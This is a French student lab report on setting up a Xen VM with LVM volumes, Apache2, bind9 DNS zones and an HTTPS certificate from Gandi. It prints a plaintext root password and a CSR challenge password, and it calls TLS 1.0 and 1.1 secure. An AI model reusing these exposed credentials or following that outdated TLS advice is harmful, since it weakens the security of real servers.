      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
==== Mdadm : Gestionnaire de RAID Logiciel ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
